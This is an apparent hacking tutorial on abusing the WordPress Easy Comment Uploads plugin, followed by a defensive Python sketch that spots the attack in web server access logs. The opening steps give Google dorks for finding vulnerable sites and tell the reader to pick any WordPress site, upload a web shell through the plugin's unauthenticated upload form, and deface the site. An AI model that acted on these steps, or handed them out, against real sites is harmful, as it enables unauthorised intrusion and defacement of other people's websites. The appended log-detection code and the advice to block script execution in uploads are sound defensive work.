Thousands of WordPress websites are vulnerable to this attack.
Google dorks for this WordPress exploit:
Dork:
- inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php
- /wp-content/plugins/easy-comment-uploads/upload-form.php
- Index of /wp-content/plugins/easy-comment-uploads
Step 1
Open Google.com and enter any one of the Google dorks given above.
Step 2
Now select any WordPress website and go to this URL:
VictimSite.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll get an upload option here.
Now upload your shell to deface the website.
Step 3
And now check it here:
VictimSite.com/wp-content/uploads/2012/10/yourfilehere
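Seen from the defending side, the steps above leave a recognizable trace in the web server's access log: a POST to the plugin's upload-form.php, then a request for a file under wp-content/uploads. The following detection sketch is an added example, not part of the original post; it assumes the Apache/nginx combined log format, and its log lines, IP addresses and file names are constructed.

```python
import re

# Apache/nginx "combined" access-log format (assumed; adjust for your server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOAD_FORM = "/wp-content/plugins/easy-comment-uploads/upload-form.php"
# Server-side script extensions that should never be served from uploads/.
SCRIPT_IN_UPLOADS = re.compile(
    r"^/wp-content/uploads/\d{4}/\d{2}/[^/?]+\.(php\d?|phtml|phar)(\.|$)", re.I
)

def find_suspicious(lines):
    """Return (kind, ip, path) findings for the upload-then-fetch pattern."""
    uploaders = set()   # clients that successfully POSTed to the plugin form
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue    # skip lines that are not in the assumed format
        ip, method = m["ip"], m["method"]
        path = m["path"].split("?", 1)[0]
        ok = m["status"].startswith("2")
        if method == "POST" and path.lower() == UPLOAD_FORM and ok:
            uploaders.add(ip)
            findings.append(("upload_post", ip, path))
        elif SCRIPT_IN_UPLOADS.match(path) and ok:
            kind = "script_after_upload" if ip in uploaders else "script_in_uploads"
            findings.append((kind, ip, path))
    return findings

# Constructed sample log lines (documentation IP ranges, made-up file names).
TAIL = ' "-" "Mozilla/5.0"'
SAMPLE = [
    '203.0.113.7 - - [14/Oct/2012:10:01:02 +0000] "GET ' + UPLOAD_FORM + ' HTTP/1.1" 200 812' + TAIL,
    '203.0.113.7 - - [14/Oct/2012:10:01:40 +0000] "POST ' + UPLOAD_FORM + ' HTTP/1.1" 200 640' + TAIL,
    '203.0.113.7 - - [14/Oct/2012:10:02:05 +0000] "GET /wp-content/uploads/2012/10/example.php HTTP/1.1" 200 51' + TAIL,
    '198.51.100.9 - - [14/Oct/2012:10:03:11 +0000] "POST ' + UPLOAD_FORM + ' HTTP/1.1" 200 640' + TAIL,
    '198.51.100.9 - - [14/Oct/2012:10:03:30 +0000] "GET /wp-content/uploads/2012/10/holiday.jpg HTTP/1.1" 200 48211' + TAIL,
]

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE):
        print(finding)
```

A `script_after_upload` finding means a file with a server-side script extension was served from uploads/ to the same client that posted to the plugin form. Configuring the web server to refuse script execution under wp-content/uploads removes the impact of such an upload even before the plugin is removed or updated.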
Demo Site :